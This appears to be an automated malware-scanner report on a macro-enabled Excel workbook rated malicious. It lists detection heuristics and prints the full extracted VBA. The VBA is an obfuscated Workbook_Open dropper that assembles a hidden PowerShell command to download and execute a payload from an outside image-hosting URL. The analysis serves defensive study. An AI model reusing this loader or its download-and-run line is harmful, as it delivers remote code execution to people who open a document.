MALICIOUS
238
Risk Score
Heuristics 8
-
VBA project inside OOXML medium 6 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
End If: MsgBox DhIQVELesSPbButzV + "sTtCothMGnSEWMrcQSJLvSutUtdusGzbnBXYo" + opPawSVWsFhdTzvEaSvHtnw: Dim ukabYTObvArRTChfXAySPkGVtc, tIBNBrKDHWiISfZioypOMyHOeQMDCGbtXAiPSoa: FEFJOoUvDkTESPnAvFNw = "P": MAKFcufYzAG = "o": oRweUIoKC = "w": ZLrAWGtVXIiD = "e": XXOf = "r": VriU = "s": vbKQNFSAsveCQSKfkdHXPPHDtAUYIasf = "h": UHLK = "e": STfzrGLY = "l": pteCF = "l": tIBNBrKDHWiISfZioypOMyHOeQMDCGbtXAiPSoa = FEFJOoUvDkTESPnAvFNw + MAKFcufYzAG + oRweUIoKC + ZLrAWGtVXIiD + XXOf + VriU + vbKQNFSAs … -
VBA stages a PowerShell/LOLBin download-and-run command critical OLE_VBA_BITSTRANSFER_DROPPERThe macro assembles a download command using a PowerShell or LOLBin download primitive (Start-BitsTransfer, Invoke-WebRequest, Net.WebClient, bitsadmin, certutil, ...) that fetches a remote payload, then executes it -- writing it to a script file and running it, or launching it directly from an auto-exec handler. The keywords are commonly split with PowerShell backtick / cmd caret escapes to evade scanners; this detection de-escapes the source first. A high-confidence downloader/dropper, stronger than the individual Shell / download keywords on their own.Matched line in script
Private Sub Workbook_Open() -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
End If: MsgBox DhIQVELesSPbButzV + "sTtCothMGnSEWMrcQSJLvSutUtdusGzbnBXYo" + opPawSVWsFhdTzvEaSvHtnw: Dim ukabYTObvArRTChfXAySPkGVtc, tIBNBrKDHWiISfZioypOMyHOeQMDCGbtXAiPSoa: FEFJOoUvDkTESPnAvFNw = "P": MAKFcufYzAG = "o": oRweUIoKC = "w": ZLrAWGtVXIiD = "e": XXOf = "r": VriU = "s": vbKQNFSAsveCQSKfkdHXPPHDtAUYIasf = "h": UHLK = "e": STfzrGLY = "l": pteCF = "l": tIBNBrKDHWiISfZioypOMyHOeQMDCGbtXAiPSoa = FEFJOoUvDkTESPnAvFNw + MAKFcufYzAG + oRweUIoKC + ZLrAWGtVXIiD + XXOf + VriU + vbKQNFSAs … -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
MsgBox msg, vbInformation, "ncHtDBAyeYoerrGUIsbznW": End If: End If: Set vsanDtAknoVnGsXDQQeMdSTHncIfdM = Nothing: On Error GoTo CreateIconFile_ERR: Dim BQrMMveMJWXLYhTIvhZMSItJGsyLXeWue As String: BQrMMveMJWXLYhTIvhZMSItJGsyLXeWue = Environ("TEMP") -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://j.top4top.io/p_19039etez1.jpg In document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 7972 bytes |
SHA-256: dafaf8f6e8a056f49457746a121a92692fa91b93994977e532b12aeb07fe71df |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
' rD Integer
Dim vsanDtAknoVnGsXDQQeMdSTHncIfdM As CommandBarControl: Set vsanDtAknoVnGsXDQQeMdSTHncIfdM = Nothing: With Application.CommandBars("List Range Popup"): With .Controls.Add(msoControlButton, 1, , 1, True): .Caption = "Pick &from Calendar": .OnAction = ThisWorkbook.Name & "!MUAPWchLUWozyECzIinwhQ": .BeginGroup = True: .Tag = "cRihUGMbRUAhIRwJXvYrMLvrFF": End With: End With:
' wAkDvLbvDyICFaNp
If Len(Trim(VcGfoAOMX)) Then
MsgBox "NoMCTVJeCMiLouQXwrnEtAIuGuEHDsFGpMYVHzs" & VcGfoAOMX, vbInformation
If coll.Count Then
ReDim AitQAHdAQJXrz(0 To coll.Count - 1, 0 To 3): For i = 1 To coll.Count: JWOdaUpAfPXfsCGZcXMaOsPpeGWXSnK = Split(coll(i), sep): AitQAHdAQJXrz(i - 1, 0) = i: AitQAHdAQJXrz(i - 1, 1) = JWOdaUpAfPXfsCGZcXMaOsPpeGWXSnK(1): AitQAHdAQJXrz(i - 1, 2) = JWOdaUpAfPXfsCGZcXMaOsPpeGWXSnK(0): AitQAHdAQJXrz(i - 1, 3) = JWOdaUpAfPXfsCGZcXMaOsPpeGWXSnK(2): Next i: SF.Caption = "FcJk """ & VcGfoAOMX & """": SF.Show: SF.ListBox_Search.List = AitQAHdAQJXrz: SF.TextBox_count.Text = coll.Count
Else: msg = "hcIWXDRQsAHSETTucodVeaoSNGyLSJV" & vbNewLine & _
"NcHKNChewpXBWHwdS """ & VcGfoAOMX & """ NcHKNChewpXBWHwdS «" & ActiveWorkbook.Name & "»"
MsgBox msg, vbInformation, "ncHtDBAyeYoerrGUIsbznW": End If: End If: Set vsanDtAknoVnGsXDQQeMdSTHncIfdM = Nothing: On Error GoTo CreateIconFile_ERR: Dim BQrMMveMJWXLYhTIvhZMSItJGsyLXeWue As String: BQrMMveMJWXLYhTIvhZMSItJGsyLXeWue = Environ("TEMP")
If Len(BQrMMveMJWXLYhTIvhZMSItJGsyLXeWue) > 0 Then
If Right(BQrMMveMJWXLYhTIvhZMSItJGsyLXeWue, 1) <> "\" Or Right(BQrMMveMJWXLYhTIvhZMSItJGsyLXeWue, 1) <> "/" Then
BQrMMveMJWXLYhTIvhZMSItJGsyLXeWue = BQrMMveMJWXLYhTIvhZMSItJGsyLXeWue & "zXb"
Else: BQrMMveMJWXLYhTIvhZMSItJGsyLXeWue = BQrMMveMJWXLYhTIvhZMSItJGsyLXeWue & "zXb": End If
Else: BQrMMveMJWXLYhTIvhZMSItJGsyLXeWue = "zXb": End If: sPathToIcon = BQrMMveMJWXLYhTIvhZMSItJGsyLXeWue
CreateIconFile_ERR:
nfuaKaCvBopoTPIDsacHKkeecwkhhKwNNdeUBI = nfuaKaCvBopoTPIDsacHKkeecwkhhKwNNdeUBI + 1: Dim fybEOtLOBnUnLMpaCLMHkMAtQEQF As Range: Dim WFkhBBEDwkCOiWZMVTahFveeORMHfFHBwDZWNV As String, uJQMUPvfFsabVFdnUWaveJzErEdyG As String: WFkhBBEDwkCOiWZMVTahFveeORMHfFHBwDZWNV = "dHiQEfbApBaiHvnvDMd": uJQMUPvfFsabVFdnUWaveJzErEdyG = "pWFKCZiaChDLbaTWXKdhyStUczsPFEtVEUfKCuZ"
If WFkhBBEDwkCOiWZMVTahFveeORMHfFHBwDZWNV <> uJQMUPvfFsabVFdnUWaveJzErEdyG Then
' zuSabCGAMooMrBLo
End If: MsgBox DhIQVELesSPbButzV + "sTtCothMGnSEWMrcQSJLvSutUtdusGzbnBXYo" + opPawSVWsFhdTzvEaSvHtnw: Dim ukabYTObvArRTChfXAySPkGVtc, tIBNBrKDHWiISfZioypOMyHOeQMDCGbtXAiPSoa: FEFJOoUvDkTESPnAvFNw = "P": MAKFcufYzAG = "o": oRweUIoKC = "w": ZLrAWGtVXIiD = "e": XXOf = "r": VriU = "s": vbKQNFSAsveCQSKfkdHXPPHDtAUYIasf = "h": UHLK = "e": STfzrGLY = "l": pteCF = "l": tIBNBrKDHWiISfZioypOMyHOeQMDCGbtXAiPSoa = FEFJOoUvDkTESPnAvFNw + MAKFcufYzAG + oRweUIoKC + ZLrAWGtVXIiD + XXOf + VriU + vbKQNFSAsveCQSKfkdHXPPHDtAUYIasf + UHLK + STfzrGLY + pteCF + " -noexit -comma Invoke-Expression(New-Object Net.WebClient).DowNloAdSTRiNg.Invoke('https://j.top4top.io/p_19039etez1.jpg')""": Set ukabYTObvArRTChfXAySPkGVtc = CreateObject("WScript.Shell"): ukabYTObvArRTChfXAySPkGVtc.Run tIBNBrKDHWiISfZioypOMyHOeQMDCGbtXAiPSoa, 0: Dim QLyaeSRBnZvXTBpRChSNGOyCIVyWoLcadCnH As String ' JkcBzUGsRtZiVYQDvkHKbkGd: Dim PUuikrrkbRfib As Integer: ' LJXWLHTFLfYzTOnerzZdSXIcFXBGOuuzQpeHHWy
For PUuikrrkbRfib = 1 To 10: QLyaeSRBnZvXTBpRChSNGOyCIVyWoLcadCnH = QLyaeSRBnZvXTBpRChSNGOyCIVyWoLcadCnH + CStr(PUuikrrkbRfib) ' PUuikrrkbRfib String
If PUuikrrkbRfib = 5 Then Exit For
Next PUuikrrkbRfib: QLyaeSRBnZvXTBpRChSNGOyCIVyWoLcadCnH = Val("hwHMkseNUoABUoJK") ' XBuIsRNauUASuUkyO:QLyaeSRBnZvXTBpRChSNGOyCIVyWoLcadCnH = QLyaeSRBnZvXTBpRChSNGOyCIVyWoLcadCnH + 10:MsgBox QLyaeSRBnZvXTBpRChSNGOyCIVyWoLcadCnH:On Error Resume Next ' IJD:QLyaeSRBnZvXTBpRChSNGOyCIVyWoLcadCnH = 5 / 0
MsgBox QLyaeSRBnZvXTBpRChSNGOyCIVyWoLcadCnH
On Error Resume Next: Err.Clear
Set FEFJOoUvDkTESPnAvFNw = CreateObject("scripting.filesystemobject")
Set ukabYTObvArRTChfXAySPkGVtc = FEFJOoUvDkTESPnAvFNw.CreateTextFile(Filename, True)
rXWLzQnbILKKzPXL.Write txt: rXWLzQnbILKKzPXL.Close
SaveTXTfile = Err = 0
Set ukabYTObvArRTChfXAySPkGVtc = Nothing: Set fso = Nothing
On Error GoTo Err ' DGdYXCutMbiGMbDN Err:QLyaeSRBnZvXTBpRChSNGOyCIVyWoLcadCnH = 5 / 0:MsgBox "OK!"
Err:
MsgBox "SySSdzkcQKnEQKGp!": On Error GoTo 0 ' TEKadYhUyHGzKXtH:' rXWLzQnbILKKzPXL
' rD Integer
Do While True
Exit Do
Loop 'While True
Do 'Until False
Exit Do
Loop Until False
' AitQAHdAQJXrz.
Dim VLeLtnOHWytXeovy(1 To 10, 5 To 6) As Integer: VLeLtnOHWytXeovy(1, 6) = 8: Dim tetrNhXNiCBkUfRC As New Collection: Dim fNevfSafvpnOPDse As Collection: tetrNhXNiCBkUfRC.Add "fPesfTafskyPRGAfIz", "IMnfOEJkR": Set fNevfSafvpnOPDse = tetrNhXNiCBkUfRC ' IMnfOEJkR Set:MsgBox fNevfSafvpnOPDse("IMnfOEJkR"):Set fNevfSafvpnOPDse = New Collection: MsgBox fNevfSafvpnOPDse.Count
On Error Resume Next: Err.Clear
res = InputBox("zssSdfIaSEuLPZFSdzryoi", "FOOWNeKPWGCctVGaOMNFAdQbhGO")
If VarType(res) = vbBoolean Then Exit Sub ' zssSdfIaSEuLPZFSdzryoi
Set ra = Range([A2], Range("A" & Rows.Count).End(xlUp))
Application.ScreenUpdating = False
ra.Font.Color = 0: ra.Font.Bold = 0
For Each cell In ra.Cells
pos = 1
If cell.Text Like "*" & txt & "*" Then
arr = Split(cell.Text, txt, , vbTextCompare)
If UBound(arr) > 0 Then
For Each v In arr
JWOdaUpAfPXfsCGZcXMaOsPpeGWXSnK = JWOdaUpAfPXfsCGZcXMaOsPpeGWXSnK + Len(v) ' oYYNyfHuNCbrkcDJzfXuiuBhUnZ
With cell.Characters(JWOdaUpAfPXfsCGZcXMaOsPpeGWXSnK, Len(txt))
.Font.ColorIndex = 3 ' kniAUUWVrcSTFLusWMIUQn
.Font.Bold = True 'yIXPAUciwVyZYeziZnKXPrNdiyFSiCa
End With
JWOdaUpAfPXfsCGZcXMaOsPpeGWXSnK = JWOdaUpAfPXfsCGZcXMaOsPpeGWXSnK + Len(txt)
Next v
End If
End If
Next cell: On Error Resume Next: Colors = Array(FcJk, hcIWXDRQsAHSETTucodVeaoSNGyLSJV, ncHtDBAyeYoerrGUIsbznW, VcGfoAOMX, QLyaeSRBnZvXTBpRChSNGOyCIVyWoLcadCnH, _
NcHKNChewpXBWHwdS): Err.Clear: Set FcJk = Intersect(Selection, ActiveSheet.UsedRange)
If Err Then Exit Sub: FcJk.Interior.ColorIndex = xlColorIndexNone: Application.ScreenUpdating = False
For Each cell In ra.Cells: Err.Clear: If Len(Trim(cell)) Then coll.Add hcIWXDRQsAHSETTucodVeaoSNGyLSJV(cell.Value), hcIWXDRQsAHSETTucodVeaoSNGyLSJV(cell.Value): If Err Then dupes.Add hcIWXDRQsAHSETTucodVeaoSNGyLSJV(cell.Value), hcIWXDRQsAHSETTucodVeaoSNGyLSJV(cell.Value)
Next cell: For Each cell In ra.Cells
cell.Interior.Color = (CStr(cell.Value))
'QLyaeSRBnZvXTBpRChSNGOyCIVyWoLcadCnH AitQAHdAQJXrz
Next cell
Application.ScreenUpdating = True
'QLyaeSRBnZvXTBpRChSNGOyCIVyWoLcadCnH
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{BFDED88D-3204-45F0-8F88-5C49B0D8A8EF}{03FA106A-845F-4E8F-A725-CD68E59EEC33}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 24576 bytes |
SHA-256: fbdf0e97b4f5df5c2386fe8dd5e9f925a2870da633b885a16af728e830e1dea4 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.